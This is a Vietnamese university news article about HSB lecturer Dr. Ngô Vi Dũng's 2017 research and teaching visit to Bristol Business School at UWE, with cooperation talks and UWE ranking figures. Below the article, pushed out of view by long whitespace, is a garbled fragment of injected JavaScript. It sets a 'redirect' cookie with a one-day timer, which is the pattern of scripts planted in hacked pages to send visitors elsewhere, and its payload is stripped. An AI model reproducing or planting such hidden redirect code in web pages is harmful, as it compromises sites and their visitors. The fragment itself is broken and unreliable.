Từ ngày 15/10 – 15/11/2017, TS.Ngô Vi Dũng, giảng viên phụ trách chuyên ngành Khởi nghiệp và Đổi mới sáng tạo (Entrepreneurship and Innovation) của Khoa Quản trị và Kinh doanh (HSB) – ĐHQG Hà Nội đã thực hiện chuyến công tác trao đổi nghiên cứu và giảng dạy ngắn hạn tại Trường Kinh doanh Bristol (Bristol Business Shool-BBS), Đại học Tây Anh quốc (University of the West of England-UWE).
Chuyến công tác nhận được sự tài trợ của Chương trình hợp tác giữa Quỹ Phát triển khoa học và công nghệ quốc gia Việt Nam, Bộ Khoa học và Công nghệ (Nafosted) và The UK Academies.

Anh Dung  1

TS.Ngô Vi Dũng trình bày kết quả nghiên cứu trong seminar khoa học tại BBS-UWE
Với vai trò là giảng viên thỉnh giảng, TS.Ngô Vi Dũng đã thực hiện các hoạt động nghiên cứu, giảng dạy và seminar khoa học với các đồng nghiệp tại BBS-UWE.
Bên cạnh đó, trên cương vị là Trưởng phòng Khoa học công nghệ và Hợp tác phát triển của HSB, TS.Ngô Vi Dũng và các đồng nghiệp tại BBS-UWE đã trao đổi về các cơ hội hợp tác giữa HSB với BBS-UWE và giữa các cá nhân, nhóm nghiên cứu, góp phần giới thiệu hình ảnh của Khoa Quản trị và Kinh doanh ra bạn bè thế giới.

Anh Dung 2

TS.Ngô Vi Dũng gặp và trao đổi với GS.Nicholas O’Regan, Phó Hiệu trưởng phụ trách Nghiên cứu và Đổi mới sáng tạo của BBS-UWE
Tại HSB, dẫn đầu và đổi mới sáng tạo theo tiêu chuẩn quốc tế, phù hợp với bối cảnh và khả năng ứng dụng tại Việt Nam luôn là triết lý và giá trị xuyên suốt trong các hoạt động nghiên cứu, đào tạo và tư vấn. HSB đã và đang đẩy mạnh xây dựng đội ngũ cán bộ giảng dạy, nghiên cứu để thực hiện mục tiêu phát triển trong giai đoạn mới của Khoa và đóng góp vào sự phát triển chung của ĐHQG Hà Nội – Đại học nghiên cứu đa ngành và liên ngành số 1 tại Việt Nam. Trong đó, việc nâng cao năng lực cán bộ thông qua hoạt động giảng dạy, nghiên cứu ở nước ngoài đóng một vai trò quan trọng.
Được biết UWE là đại học nằm trong top 200 đại học trẻ thế giới (Young University Rankings 2017 theo xếp hạng của Timeshighereducation), đứng thứ 55 tại Anh quốc và thứ 705 trên thế giới theo xếp hạng của Webometrics (*)

*http://www.webometrics.info/en/Europe/United%20Kingdom.

                                                                                                                                                                                                                                             Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}